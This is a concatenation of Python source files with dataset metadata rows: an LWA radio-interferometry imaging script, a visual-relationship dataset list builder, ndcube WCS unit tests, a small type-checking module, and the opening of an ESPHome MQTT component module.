idict['wtsinfo'] = {}
for pol in ['P11', 'P12', 'P21', 'P22']:
idict['wtsinfo'][pol] = [{'orientation':0.0, 'lookup':'/data3/t_nithyanandan/project_MOFF/simulated/LWA/data/lookup/E_illumination_isotropic_radiators_lookup_zenith.txt'}]
interferometer_level_update_info['interferometers'] += [idict]
iar.update(antenna_level_updates=antenna_level_update_info, interferometer_level_updates=interferometer_level_update_info, do_correlate='FX', parallel=True, verbose=True)
iar.grid_convolve(pol='P11', method='NN', distNN=0.5*FCNST.c/f0, tol=1.0e-6, maxmatch=1, identical_interferometers=True, gridfunc_freq='scale', mapping='weighted', wts_change=False, parallel=True, pp_method='queue')
imgobj = AA.NewImage(interferometer_array=iar, pol='P11')
imgobj.imagr(weighting='natural', pol='P11')
if i == 0:
avg_img = imgobj.img['P11']
else:
avg_img += imgobj.img['P11']
avg_img /= max_n_timestamps
fig = PLT.figure()
ax = fig.add_subplot(111)
imgplot = ax.imshow(NP.mean(avg_img, axis=2), aspect='equal', origin='lower', extent=(imgobj.gridl.min(), imgobj.gridl.max(), imgobj.gridm.min(), imgobj.gridm.max()))
# posplot, = ax.plot(skypos[:,0], skypos[:,1], 'o', mfc='none', mec='black', mew=1, ms=8)
ax.set_xlim(imgobj.gridl.min(), imgobj.gridl.max())
ax.set_ylim(imgobj.gridm.min(), imgobj.gridm.max())
PLT.savefig('/data3/t_nithyanandan/project_MOFF/data/samples/figures/FX_LWA_sample_image_{0:0d}_iterations.png'.format(max_n_timestamps), bbox_inches=0)
PDB.set_trace()
PLT.close(fig)
fig = PLT.figure()
ax = fig.add_subplot(111)
imgplot = ax.imshow(NP.mean(imgobj.beam['P11'], axis=2), aspect='equal', origin='lower', extent=(imgobj.gridl.min(), imgobj.gridl.max(), imgobj.gridm.min(), imgobj.gridm.max()))
ax.set_xlim(imgobj.gridl.min(), imgobj.gridl.max())
ax.set_ylim(imgobj.gridm.min(), imgobj.gridm.max())
PLT.savefig('/data3/t_nithyanandan/project_MOFF/data/samples/figures/FX_LWA_psf.png'.format(itr), bbox_inches=0)
PLT.close(fig)
| 46.757895 | 219 | 0.647794 | import datetime as DT
import numpy as NP
import matplotlib.pyplot as PLT
import matplotlib.colors as PLTC
import scipy.constants as FCNST
from astropy.io import fits
from astropy.io import ascii
from astropy.table import Table
import progressbar as PGB
import antenna_array as AA
import geometry as GEOM
import my_DSP_modules as DSP
import sim_observe as SIM
import ipdb as PDB
LWA_reformatted_datafile_prefix = '/data3/t_nithyanandan/project_MOFF/data/samples/lwa_reformatted_data_test'
LWA_pol0_reformatted_datafile = LWA_reformatted_datafile_prefix + '.pol-0.fits'
LWA_pol1_reformatted_datafile = LWA_reformatted_datafile_prefix + '.pol-1.fits'
max_n_timestamps = 9
hdulist0 = fits.open(LWA_pol0_reformatted_datafile)
hdulist1 = fits.open(LWA_pol1_reformatted_datafile)
extnames = [h.header['EXTNAME'] for h in hdulist0]
lat = hdulist0['PRIMARY'].header['latitude']
f0 = hdulist0['PRIMARY'].header['center_freq']
nchan = hdulist0['PRIMARY'].header['nchan']
dt = 1.0 / hdulist0['PRIMARY'].header['sample_rate']
freqs = hdulist0['freqs'].data
channel_width = freqs[1] - freqs[0]
f_center = f0
bchan = 63
echan = 963
max_antenna_radius = 40.0 # in meters
# max_antenna_radius = 75.0 # in meters
antid = hdulist0['Antenna Positions'].data['Antenna']
antpos = hdulist0['Antenna Positions'].data['Position']
# antpos -= NP.mean(antpos, axis=0).reshape(1,-1)
core_ind = NP.logical_and((NP.abs(antpos[:,0]) < max_antenna_radius), (NP.abs(antpos[:,1]) < max_antenna_radius))
# core_ind = NP.logical_and((NP.abs(antpos[:,0]) <= NP.max(NP.abs(antpos[:,0]))), (NP.abs(antpos[:,1]) < NP.max(NP.abs(antpos[:,1]))))
ant_info = NP.hstack((antid[core_ind].reshape(-1,1), antpos[core_ind,:]))
n_antennas = ant_info.shape[0]
ants = []
aar = AA.AntennaArray()
for i in xrange(n_antennas):
ant = AA.Antenna('{0:0d}'.format(int(ant_info[i,0])), lat, ant_info[i,1:], f0, nsamples=nchan)
ant.f = ant.f0 + DSP.spectax(2*nchan, dt, shift=True)
ants += [ant]
aar = aar + ant
timestamps = hdulist0['TIMESTAMPS'].data['timestamp']
if max_n_timestamps is None:
max_n_timestamps = len(timestamps)
else:
max_n_timestamps = min(max_n_timestamps, len(timestamps))
timestamps = timestamps[:max_n_timestamps]
stand_cable_delays = NP.loadtxt('/data3/t_nithyanandan/project_MOFF/data/samples/cable_delays.txt', skiprows=1)
antennas = stand_cable_delays[:,0].astype(NP.int).astype(str)
cable_delays = stand_cable_delays[:,1]
iar = AA.InterferometerArray(antenna_array=aar)
iar.grid()
count = 0
for i in xrange(max_n_timestamps):
timestamp = timestamps[i]
antenna_level_update_info = {}
antenna_level_update_info['antenna_array'] = {}
antenna_level_update_info['antenna_array']['timestamp'] = timestamp
antenna_level_update_info['antennas'] = []
for label in iar.antenna_array.antennas:
adict = {}
adict['label'] = label
adict['action'] = 'modify'
adict['timestamp'] = timestamp
adict['Et'] = {}
adict['flags'] = {}
adict['delaydict'] = {}
if label in hdulist0[timestamp].columns.names:
adict['t'] = NP.arange(nchan) * dt
Et_P1 = hdulist0[timestamp].data[label]
adict['Et']['P1'] = Et_P1[:,0] + 1j * Et_P1[:,1]
adict['flags']['P1'] = False
# adict['gridfunc_freq'] = 'scale'
# adict['wtsinfo_P1'] = [{'orientation':0.0, 'lookup':'/data3/t_nithyanandan/project_MOFF/simulated/LWA/data/lookup/E_illumination_isotropic_radiators_lookup_zenith.txt'}]
# adict['gridmethod'] = 'NN'
# adict['distNN'] = 0.5 * FCNST.c / f0
# adict['tol'] = 1.0e-6
# adict['maxmatch'] = 1
adict['delaydict']['P1'] = {}
adict['delaydict']['P1']['frequencies'] = hdulist0['FREQUENCIES AND CABLE DELAYS'].data['frequency']
# adict['delaydict_P1']['delays'] = hdulist0['FREQUENCIES AND CABLE DELAYS'].data[label]
adict['delaydict']['P1']['delays'] = cable_delays[antennas == label]
adict['delaydict']['P1']['fftshifted'] = True
else:
adict['flags']['P1'] = True
if label in hdulist1[timestamp].columns.names:
adict['t'] = NP.arange(nchan) * dt
Et_P2 = hdulist1[timestamp].data[label]
adict['Et']['P2'] = Et_P2[:,0] + 1j * Et_P2[:,1]
adict['flags']['P2'] = False
# adict['gridfunc_freq'] = 'scale'
# adict['wtsinfo_P2'] = [{'orientation':0.0, 'lookup':'/data3/t_nithyanandan/project_MOFF/simulated/LWA/data/lookup/E_illumination_isotropic_radiators_lookup_zenith.txt'}]
# adict['gridmethod'] = 'NN'
# adict['distNN'] = 0.5 * FCNST.c / f0
# adict['tol'] = 1.0e-6
# adict['maxmatch'] = 1
adict['delaydict']['P2'] = {}
adict['delaydict']['P2']['frequencies'] = hdulist1['FREQUENCIES AND CABLE DELAYS'].data['frequency']
# adict['delaydict_P2']['delays'] = hdulist1['FREQUENCIES AND CABLE DELAYS'].data[label]
adict['delaydict']['P2']['delays'] = cable_delays[antennas == label]
adict['delaydict']['P2']['fftshifted'] = True
else:
adict['flags']['P2'] = True
antenna_level_update_info['antennas'] += [adict]
# if label in hdulist1[timestamp].columns.names:
# adict['t'] = NP.arange(nchan) * dt
# Et_P2 = hdulist1[timestamp].data[label]
# adict['Et_P2'] = Et_P2[:,0] + 1j * Et_P2[:,1]
# adict['flag_P2'] = False
# # adict['gridfunc_freq'] = 'scale'
# # adict['wtsinfo_P2'] = [{'orientation':0.0, 'lookup':'/data3/t_nithyanandan/project_MOFF/simulated/LWA/data/lookup/E_illumination_isotropic_radiators_lookup_zenith.txt'}]
# # adict['gridmethod'] = 'NN'
# # adict['distNN'] = 0.5 * FCNST.c / f0
# # adict['tol'] = 1.0e-6
# # adict['maxmatch'] = 1
# adict['delaydict_P2'] = {}
# adict['delaydict_P2']['pol'] = 'P2'
# adict['delaydict_P2']['frequencies'] = hdulist0['FREQUENCIES AND CABLE DELAYS'].data['frequency']
# # adict['delaydict_P2']['delays'] = hdulist0['FREQUENCIES AND CABLE DELAYS'].data[label]
# adict['delaydict_P2']['delays'] = cable_delays[antennas == label]
# adict['delaydict_P2']['fftshifted'] = True
# else:
# adict['flag_P2'] = True
interferometer_level_update_info = {}
interferometer_level_update_info['interferometers'] = []
for label in iar.interferometers:
idict = {}
idict['label'] = label
idict['action'] = 'modify'
idict['gridfunc_freq'] = 'scale'
idict['gridmethod'] = 'NN'
idict['distNN'] = 0.5 * FCNST.c / f0
idict['tol'] = 1.0e-6
idict['maxmatch'] = 1
idict['wtsinfo'] = {}
for pol in ['P11', 'P12', 'P21', 'P22']:
idict['wtsinfo'][pol] = [{'orientation':0.0, 'lookup':'/data3/t_nithyanandan/project_MOFF/simulated/LWA/data/lookup/E_illumination_isotropic_radiators_lookup_zenith.txt'}]
interferometer_level_update_info['interferometers'] += [idict]
iar.update(antenna_level_updates=antenna_level_update_info, interferometer_level_updates=interferometer_level_update_info, do_correlate='FX', parallel=True, verbose=True)
iar.grid_convolve(pol='P11', method='NN', distNN=0.5*FCNST.c/f0, tol=1.0e-6, maxmatch=1, identical_interferometers=True, gridfunc_freq='scale', mapping='weighted', wts_change=False, parallel=True, pp_method='queue')
imgobj = AA.NewImage(interferometer_array=iar, pol='P11')
imgobj.imagr(weighting='natural', pol='P11')
if i == 0:
avg_img = imgobj.img['P11']
else:
avg_img += imgobj.img['P11']
avg_img /= max_n_timestamps
fig = PLT.figure()
ax = fig.add_subplot(111)
imgplot = ax.imshow(NP.mean(avg_img, axis=2), aspect='equal', origin='lower', extent=(imgobj.gridl.min(), imgobj.gridl.max(), imgobj.gridm.min(), imgobj.gridm.max()))
# posplot, = ax.plot(skypos[:,0], skypos[:,1], 'o', mfc='none', mec='black', mew=1, ms=8)
ax.set_xlim(imgobj.gridl.min(), imgobj.gridl.max())
ax.set_ylim(imgobj.gridm.min(), imgobj.gridm.max())
PLT.savefig('/data3/t_nithyanandan/project_MOFF/data/samples/figures/FX_LWA_sample_image_{0:0d}_iterations.png'.format(max_n_timestamps), bbox_inches=0)
PDB.set_trace()
PLT.close(fig)
fig = PLT.figure()
ax = fig.add_subplot(111)
imgplot = ax.imshow(NP.mean(imgobj.beam['P11'], axis=2), aspect='equal', origin='lower', extent=(imgobj.gridl.min(), imgobj.gridl.max(), imgobj.gridm.min(), imgobj.gridm.max()))
ax.set_xlim(imgobj.gridl.min(), imgobj.gridl.max())
ax.set_ylim(imgobj.gridm.min(), imgobj.gridm.max())
PLT.savefig('/data3/t_nithyanandan/project_MOFF/data/samples/figures/FX_LWA_psf.png'.format(itr), bbox_inches=0)
PLT.close(fig)
| 0 | 0 | 0 |
eb9a9f1b47b096471f29f1f8404752392820034c | 1,220 | py | Python | convert_to_list.py | HimanchalChandra/visual-relationship-detection | 74922fbb8a3dc1a15b539a7178acb48256f3ad0c | [
"Apache-2.0"
] | 2 | 2021-04-16T08:33:24.000Z | 2021-10-15T12:21:53.000Z | convert_to_list.py | HimanchalChandra/visual-relationship-detection | 74922fbb8a3dc1a15b539a7178acb48256f3ad0c | [
"Apache-2.0"
] | null | null | null | convert_to_list.py | HimanchalChandra/visual-relationship-detection | 74922fbb8a3dc1a15b539a7178acb48256f3ad0c | [
"Apache-2.0"
] | null | null | null | import json
import os
from opts import parse_opts
opt = parse_opts()
# prepare train.txt
with open(os.path.join(opt.dataset_path, 'json_dataset','annotations_train.json'), 'r') as f:
annotations = json.load(f)
sg_train_images = os.listdir(os.path.join(opt.dataset_path,'sg_dataset','sg_train_images'))
sg_test_images = os.listdir(os.path.join(opt.dataset_path,'sg_dataset','sg_test_images'))
annotations_copy = annotations.copy()
for ann in annotations.items():
if(not annotations[ann[0]] or ann[0] not in sg_train_images):
annotations_copy.pop(ann[0])
with open(os.path.join(opt.dataset_path, 'train.txt'),'a') as f:
for ann in annotations_copy.items():
f.write(ann[0])
f.write('\n')
# prepare test.txt
with open(os.path.join(opt.dataset_path, 'json_dataset','annotations_test.json'), 'r') as f:
annotations = json.load(f)
annotations_copy = annotations.copy()
for ann in annotations.items():
if(not annotations[ann[0]] or ann[0] not in sg_test_images):
annotations_copy.pop(ann[0])
with open(os.path.join(opt.dataset_path, 'test.txt'),'a') as f:
for ann in annotations_copy.items():
f.write(ann[0])
f.write('\n')
| 27.727273 | 93 | 0.686066 | import json
import os
from opts import parse_opts
opt = parse_opts()
# prepare train.txt
with open(os.path.join(opt.dataset_path, 'json_dataset','annotations_train.json'), 'r') as f:
annotations = json.load(f)
sg_train_images = os.listdir(os.path.join(opt.dataset_path,'sg_dataset','sg_train_images'))
sg_test_images = os.listdir(os.path.join(opt.dataset_path,'sg_dataset','sg_test_images'))
annotations_copy = annotations.copy()
for ann in annotations.items():
if(not annotations[ann[0]] or ann[0] not in sg_train_images):
annotations_copy.pop(ann[0])
with open(os.path.join(opt.dataset_path, 'train.txt'),'a') as f:
for ann in annotations_copy.items():
f.write(ann[0])
f.write('\n')
# prepare test.txt
with open(os.path.join(opt.dataset_path, 'json_dataset','annotations_test.json'), 'r') as f:
annotations = json.load(f)
annotations_copy = annotations.copy()
for ann in annotations.items():
if(not annotations[ann[0]] or ann[0] not in sg_test_images):
annotations_copy.pop(ann[0])
with open(os.path.join(opt.dataset_path, 'test.txt'),'a') as f:
for ann in annotations_copy.items():
f.write(ann[0])
f.write('\n')
| 0 | 0 | 0 |
f62dc224cc333347c997eb5e3bac4a133452c4ee | 4,528 | py | Python | ndcube/tests/test_utils_wcs.py | BaptistePellorceAstro/ndcube | eaa2841a6bf90ac2fb2f901747c9a297c0810862 | [
"BSD-2-Clause"
] | null | null | null | ndcube/tests/test_utils_wcs.py | BaptistePellorceAstro/ndcube | eaa2841a6bf90ac2fb2f901747c9a297c0810862 | [
"BSD-2-Clause"
] | null | null | null | ndcube/tests/test_utils_wcs.py | BaptistePellorceAstro/ndcube | eaa2841a6bf90ac2fb2f901747c9a297c0810862 | [
"BSD-2-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
import pytest
import unittest
import numpy as np
import astropy.wcs
from ndcube import utils
from ndcube.tests import helpers
ht = {'CTYPE3': 'HPLT-TAN', 'CUNIT3': 'deg', 'CDELT3': 0.5, 'CRPIX3': 0, 'CRVAL3': 0, 'NAXIS3': 2,
'CTYPE2': 'WAVE ', 'CUNIT2': 'Angstrom', 'CDELT2': 0.2, 'CRPIX2': 0, 'CRVAL2': 0,
'NAXIS2': 3,
'CTYPE1': 'TIME ', 'CUNIT1': 'min', 'CDELT1': 0.4, 'CRPIX1': 0, 'CRVAL1': 0, 'NAXIS1': 4}
wt = utils.wcs.WCS(header=ht, naxis=3)
ht_with_celestial = {
'CTYPE4': 'HPLN-TAN', 'CUNIT4': 'deg', 'CDELT4': 1, 'CRPIX4': 0, 'CRVAL4': 0, 'NAXIS4': 1,
'CNAME4': 'redundant axis', 'CROTA4': 0,
'CTYPE3': 'HPLT-TAN', 'CUNIT3': 'deg', 'CDELT3': 0.5, 'CRPIX3': 0, 'CRVAL3': 0, 'NAXIS3': 2,
'CTYPE2': 'WAVE ', 'CUNIT2': 'Angstrom', 'CDELT2': 0.2, 'CRPIX2': 0, 'CRVAL2': 0,
'NAXIS2': 3,
'CTYPE1': 'TIME ', 'CUNIT1': 'min', 'CDELT1': 0.4, 'CRPIX1': 0, 'CRVAL1': 0, 'NAXIS1': 4}
hm = {'CTYPE1': 'WAVE ', 'CUNIT1': 'Angstrom', 'CDELT1': 0.2, 'CRPIX1': 0, 'CRVAL1': 10,
'NAXIS1': 4,
'CTYPE2': 'HPLT-TAN', 'CUNIT2': 'deg', 'CDELT2': 0.5, 'CRPIX2': 2, 'CRVAL2': 0.5,
'NAXIS2': 3,
'CTYPE3': 'HPLN-TAN', 'CUNIT3': 'deg', 'CDELT3': 0.4, 'CRPIX3': 2, 'CRVAL3': 1, 'NAXIS3': 2}
wm = utils.wcs.WCS(header=hm, naxis=3)
hm_reindexed_102 = {
'CTYPE2': 'WAVE ', 'CUNIT2': 'Angstrom', 'CDELT2': 0.2, 'CRPIX2': 0, 'CRVAL2': 10,
'NAXIS2': 4,
'CTYPE1': 'HPLT-TAN', 'CUNIT1': 'deg', 'CDELT1': 0.5, 'CRPIX1': 2, 'CRVAL1': 0.5, 'NAXIS1': 3,
'CTYPE3': 'HPLN-TAN', 'CUNIT3': 'deg', 'CDELT3': 0.4, 'CRPIX3': 2, 'CRVAL3': 1, 'NAXIS3': 2}
wm_reindexed_102 = utils.wcs.WCS(header=hm_reindexed_102, naxis=3)
@pytest.mark.parametrize("test_input,expected", [(ht, True), (hm, False)])
@pytest.mark.parametrize("test_input,expected", [((ht, 3), ht_with_celestial)])
@pytest.mark.parametrize(
"test_input,expected",
[({}, False),
([slice(1, 5), slice(-1, -5, -2)], True)])
@pytest.mark.parametrize(
"test_input,expected",
[({}, []),
((slice(1, 2), slice(1, 3), 2, slice(2, 4), 8),
[slice(1, 2, None), slice(1, 3, None), slice(2, 3, None),
slice(2, 4, None), slice(8, 9, None)])])
@pytest.mark.parametrize("test_input,expected", [
((wm, np.array([1, 0, 2])), wm_reindexed_102),
((wm, np.array([1, 0, -1])), wm_reindexed_102)
])
@pytest.mark.parametrize("test_input", [
(TypeError, wm, 0),
(TypeError, wm, np.array(['spam', 'eggs', 'ham'])),
])
@pytest.mark.parametrize("test_input,expected", [
((wm, 0, [False, False, False]), (0, 1)),
((wm, 1, [False, False, False]), (0, 1)),
((wm, 2, [False, False, False]), (2,)),
((wm, 1, [False, False, True]), (1,))
])
@pytest.mark.parametrize("test_input,expected", [
((wm, 0), (0,)),
((wm, 1), (1, 2)),
((wm, 2), (1, 2)),
])
@pytest.mark.parametrize("test_input,expected", [
(wm, np.array([[True, False, False], [False, True, True], [False, True, True]])),
(wt, np.array([[True, False, False, False], [False, True, False, False],
[False, False, True, True], [False, False, True, True]])),
(wm_reindexed_102, np.array([[True, False, True], [False, True, False],
[True, False, True]]))
])
| 38.05042 | 98 | 0.612633 | # -*- coding: utf-8 -*-
import pytest
import unittest
import numpy as np
import astropy.wcs
from ndcube import utils
from ndcube.tests import helpers
ht = {'CTYPE3': 'HPLT-TAN', 'CUNIT3': 'deg', 'CDELT3': 0.5, 'CRPIX3': 0, 'CRVAL3': 0, 'NAXIS3': 2,
'CTYPE2': 'WAVE ', 'CUNIT2': 'Angstrom', 'CDELT2': 0.2, 'CRPIX2': 0, 'CRVAL2': 0,
'NAXIS2': 3,
'CTYPE1': 'TIME ', 'CUNIT1': 'min', 'CDELT1': 0.4, 'CRPIX1': 0, 'CRVAL1': 0, 'NAXIS1': 4}
wt = utils.wcs.WCS(header=ht, naxis=3)
ht_with_celestial = {
'CTYPE4': 'HPLN-TAN', 'CUNIT4': 'deg', 'CDELT4': 1, 'CRPIX4': 0, 'CRVAL4': 0, 'NAXIS4': 1,
'CNAME4': 'redundant axis', 'CROTA4': 0,
'CTYPE3': 'HPLT-TAN', 'CUNIT3': 'deg', 'CDELT3': 0.5, 'CRPIX3': 0, 'CRVAL3': 0, 'NAXIS3': 2,
'CTYPE2': 'WAVE ', 'CUNIT2': 'Angstrom', 'CDELT2': 0.2, 'CRPIX2': 0, 'CRVAL2': 0,
'NAXIS2': 3,
'CTYPE1': 'TIME ', 'CUNIT1': 'min', 'CDELT1': 0.4, 'CRPIX1': 0, 'CRVAL1': 0, 'NAXIS1': 4}
hm = {'CTYPE1': 'WAVE ', 'CUNIT1': 'Angstrom', 'CDELT1': 0.2, 'CRPIX1': 0, 'CRVAL1': 10,
'NAXIS1': 4,
'CTYPE2': 'HPLT-TAN', 'CUNIT2': 'deg', 'CDELT2': 0.5, 'CRPIX2': 2, 'CRVAL2': 0.5,
'NAXIS2': 3,
'CTYPE3': 'HPLN-TAN', 'CUNIT3': 'deg', 'CDELT3': 0.4, 'CRPIX3': 2, 'CRVAL3': 1, 'NAXIS3': 2}
wm = utils.wcs.WCS(header=hm, naxis=3)
hm_reindexed_102 = {
'CTYPE2': 'WAVE ', 'CUNIT2': 'Angstrom', 'CDELT2': 0.2, 'CRPIX2': 0, 'CRVAL2': 10,
'NAXIS2': 4,
'CTYPE1': 'HPLT-TAN', 'CUNIT1': 'deg', 'CDELT1': 0.5, 'CRPIX1': 2, 'CRVAL1': 0.5, 'NAXIS1': 3,
'CTYPE3': 'HPLN-TAN', 'CUNIT3': 'deg', 'CDELT3': 0.4, 'CRPIX3': 2, 'CRVAL3': 1, 'NAXIS3': 2}
wm_reindexed_102 = utils.wcs.WCS(header=hm_reindexed_102, naxis=3)
@pytest.mark.parametrize("test_input,expected", [(ht, True), (hm, False)])
def test_wcs_needs_augmenting(test_input, expected):
assert utils.wcs.WCS._needs_augmenting(test_input) is expected
@pytest.mark.parametrize("test_input,expected", [((ht, 3), ht_with_celestial)])
def test_wcs_augment(test_input, expected):
unit_tester = unittest.TestCase()
unit_tester.assertEqual(utils.wcs.WCS._augment(*test_input), expected)
@pytest.mark.parametrize(
"test_input,expected",
[({}, False),
([slice(1, 5), slice(-1, -5, -2)], True)])
def test_all_slice(test_input, expected):
assert utils.wcs._all_slice(test_input) == expected
@pytest.mark.parametrize(
"test_input,expected",
[({}, []),
((slice(1, 2), slice(1, 3), 2, slice(2, 4), 8),
[slice(1, 2, None), slice(1, 3, None), slice(2, 3, None),
slice(2, 4, None), slice(8, 9, None)])])
def test_slice_list(test_input, expected):
assert utils.wcs._slice_list(test_input) == expected
@pytest.mark.parametrize("test_input,expected", [
((wm, np.array([1, 0, 2])), wm_reindexed_102),
((wm, np.array([1, 0, -1])), wm_reindexed_102)
])
def test_reindex_wcs(test_input, expected):
print(utils.wcs.reindex_wcs(*test_input))
print(expected)
helpers.assert_wcs_are_equal(utils.wcs.reindex_wcs(*test_input), expected)
@pytest.mark.parametrize("test_input", [
(TypeError, wm, 0),
(TypeError, wm, np.array(['spam', 'eggs', 'ham'])),
])
def test_reindex_wcs_errors(test_input):
with pytest.raises(test_input[0]):
utils.wcs.reindex_wcs(*test_input[1:])
@pytest.mark.parametrize("test_input,expected", [
((wm, 0, [False, False, False]), (0, 1)),
((wm, 1, [False, False, False]), (0, 1)),
((wm, 2, [False, False, False]), (2,)),
((wm, 1, [False, False, True]), (1,))
])
def test_get_dependent_data_axes(test_input, expected):
output = utils.wcs.get_dependent_data_axes(*test_input)
assert output == expected
@pytest.mark.parametrize("test_input,expected", [
((wm, 0), (0,)),
((wm, 1), (1, 2)),
((wm, 2), (1, 2)),
])
def test_get_dependent_wcs_axes(test_input, expected):
output = utils.wcs.get_dependent_wcs_axes(*test_input)
assert output == expected
@pytest.mark.parametrize("test_input,expected", [
(wm, np.array([[True, False, False], [False, True, True], [False, True, True]])),
(wt, np.array([[True, False, False, False], [False, True, False, False],
[False, False, True, True], [False, False, True, True]])),
(wm_reindexed_102, np.array([[True, False, True], [False, True, False],
[True, False, True]]))
])
def test_axis_correlation_matrix(test_input, expected):
assert (utils.wcs.axis_correlation_matrix(test_input) == expected).all()
| 1,016 | 0 | 198 |
6ab56e40aa88ffa63c26d960b84a65a830e938f4 | 174 | py | Python | foo/bar/__init__.py | graingert/henbruas_foo_bar_baz | ba68b63e9424db97d6fd14122e8eaef1a0923a05 | [
"MIT"
] | 1 | 2020-09-26T12:41:41.000Z | 2020-09-26T12:41:41.000Z | foo/bar/__init__.py | graingert/henbruas-foo-bar-baz | ba68b63e9424db97d6fd14122e8eaef1a0923a05 | [
"MIT"
] | null | null | null | foo/bar/__init__.py | graingert/henbruas-foo-bar-baz | ba68b63e9424db97d6fd14122e8eaef1a0923a05 | [
"MIT"
] | null | null | null | import foo.bar.baz
__all__ = ["foo", "baz"]
reveal_type(foo)
reveal_type(foo.bar)
reveal_type(foo.bar.baz)
reveal_type(foo.bar.baz.x)
reveal_type(baz)
reveal_type(bar.baz)
| 15.818182 | 26 | 0.752874 | import foo.bar.baz
__all__ = ["foo", "baz"]
reveal_type(foo)
reveal_type(foo.bar)
reveal_type(foo.bar.baz)
reveal_type(foo.bar.baz.x)
reveal_type(baz)
reveal_type(bar.baz)
| 0 | 0 | 0 |
3f9275e231dab92870638e5c2ba019e1d962a073 | 18,443 | py | Python | esphome/components/mqtt/__init__.py | OttoWinter/esphomeyaml | 6a85259e4d6d1b0a0f819688b8e555efcb99ecb0 | [
"MIT"
] | 249 | 2018-04-07T12:04:11.000Z | 2019-01-25T01:11:34.000Z | esphome/components/mqtt/__init__.py | OttoWinter/esphomeyaml | 6a85259e4d6d1b0a0f819688b8e555efcb99ecb0 | [
"MIT"
] | 243 | 2018-04-11T16:37:11.000Z | 2019-01-25T16:50:37.000Z | esphome/components/mqtt/__init__.py | OttoWinter/esphomeyaml | 6a85259e4d6d1b0a0f819688b8e555efcb99ecb0 | [
"MIT"
] | 40 | 2018-04-10T05:50:14.000Z | 2019-01-25T15:20:36.000Z | import re
import esphome.codegen as cg
import esphome.config_validation as cv
from esphome import automation
from esphome.automation import Condition
from esphome.components import logger
from esphome.const import (
CONF_AVAILABILITY,
CONF_BIRTH_MESSAGE,
CONF_BROKER,
CONF_CERTIFICATE_AUTHORITY,
CONF_CLIENT_ID,
CONF_COMMAND_TOPIC,
CONF_COMMAND_RETAIN,
CONF_DISCOVERY,
CONF_DISCOVERY_PREFIX,
CONF_DISCOVERY_RETAIN,
CONF_DISCOVERY_UNIQUE_ID_GENERATOR,
CONF_DISCOVERY_OBJECT_ID_GENERATOR,
CONF_ID,
CONF_KEEPALIVE,
CONF_LEVEL,
CONF_LOG_TOPIC,
CONF_ON_JSON_MESSAGE,
CONF_ON_MESSAGE,
CONF_ON_CONNECT,
CONF_ON_DISCONNECT,
CONF_PASSWORD,
CONF_PAYLOAD,
CONF_PAYLOAD_AVAILABLE,
CONF_PAYLOAD_NOT_AVAILABLE,
CONF_PORT,
CONF_QOS,
CONF_REBOOT_TIMEOUT,
CONF_RETAIN,
CONF_SHUTDOWN_MESSAGE,
CONF_SSL_FINGERPRINTS,
CONF_STATE_TOPIC,
CONF_TOPIC,
CONF_TOPIC_PREFIX,
CONF_TRIGGER_ID,
CONF_USE_ABBREVIATIONS,
CONF_USERNAME,
CONF_WILL_MESSAGE,
)
from esphome.core import coroutine_with_priority, CORE
from esphome.components.esp32 import add_idf_sdkconfig_option
DEPENDENCIES = ["network"]
AUTO_LOAD = ["json"]
CONF_IDF_SEND_ASYNC = "idf_send_async"
CONF_SKIP_CERT_CN_CHECK = "skip_cert_cn_check"
MQTT_MESSAGE_BASE = cv.Schema(
{
cv.Required(CONF_TOPIC): cv.publish_topic,
cv.Optional(CONF_QOS, default=0): cv.mqtt_qos,
cv.Optional(CONF_RETAIN, default=True): cv.boolean,
}
)
MQTT_MESSAGE_TEMPLATE_SCHEMA = cv.Any(
None, MQTT_MESSAGE_BASE, validate_message_just_topic
)
MQTT_MESSAGE_SCHEMA = cv.Any(
None,
MQTT_MESSAGE_BASE.extend(
{
cv.Required(CONF_PAYLOAD): cv.mqtt_payload,
}
),
)
mqtt_ns = cg.esphome_ns.namespace("mqtt")
MQTTMessage = mqtt_ns.struct("MQTTMessage")
MQTTClientComponent = mqtt_ns.class_("MQTTClientComponent", cg.Component)
MQTTPublishAction = mqtt_ns.class_("MQTTPublishAction", automation.Action)
MQTTPublishJsonAction = mqtt_ns.class_("MQTTPublishJsonAction", automation.Action)
MQTTMessageTrigger = mqtt_ns.class_(
"MQTTMessageTrigger", automation.Trigger.template(cg.std_string), cg.Component
)
MQTTJsonMessageTrigger = mqtt_ns.class_(
"MQTTJsonMessageTrigger", automation.Trigger.template(cg.JsonObjectConst)
)
MQTTConnectTrigger = mqtt_ns.class_("MQTTConnectTrigger", automation.Trigger.template())
MQTTDisconnectTrigger = mqtt_ns.class_(
"MQTTDisconnectTrigger", automation.Trigger.template()
)
MQTTComponent = mqtt_ns.class_("MQTTComponent", cg.Component)
MQTTConnectedCondition = mqtt_ns.class_("MQTTConnectedCondition", Condition)
MQTTBinarySensorComponent = mqtt_ns.class_("MQTTBinarySensorComponent", MQTTComponent)
MQTTClimateComponent = mqtt_ns.class_("MQTTClimateComponent", MQTTComponent)
MQTTCoverComponent = mqtt_ns.class_("MQTTCoverComponent", MQTTComponent)
MQTTFanComponent = mqtt_ns.class_("MQTTFanComponent", MQTTComponent)
MQTTJSONLightComponent = mqtt_ns.class_("MQTTJSONLightComponent", MQTTComponent)
MQTTSensorComponent = mqtt_ns.class_("MQTTSensorComponent", MQTTComponent)
MQTTSwitchComponent = mqtt_ns.class_("MQTTSwitchComponent", MQTTComponent)
MQTTTextSensor = mqtt_ns.class_("MQTTTextSensor", MQTTComponent)
MQTTNumberComponent = mqtt_ns.class_("MQTTNumberComponent", MQTTComponent)
MQTTSelectComponent = mqtt_ns.class_("MQTTSelectComponent", MQTTComponent)
MQTTButtonComponent = mqtt_ns.class_("MQTTButtonComponent", MQTTComponent)
MQTTLockComponent = mqtt_ns.class_("MQTTLockComponent", MQTTComponent)
MQTTDiscoveryUniqueIdGenerator = mqtt_ns.enum("MQTTDiscoveryUniqueIdGenerator")
MQTT_DISCOVERY_UNIQUE_ID_GENERATOR_OPTIONS = {
"legacy": MQTTDiscoveryUniqueIdGenerator.MQTT_LEGACY_UNIQUE_ID_GENERATOR,
"mac": MQTTDiscoveryUniqueIdGenerator.MQTT_MAC_ADDRESS_UNIQUE_ID_GENERATOR,
}
MQTTDiscoveryObjectIdGenerator = mqtt_ns.enum("MQTTDiscoveryObjectIdGenerator")
MQTT_DISCOVERY_OBJECT_ID_GENERATOR_OPTIONS = {
"none": MQTTDiscoveryObjectIdGenerator.MQTT_NONE_OBJECT_ID_GENERATOR,
"device_name": MQTTDiscoveryObjectIdGenerator.MQTT_DEVICE_NAME_OBJECT_ID_GENERATOR,
}
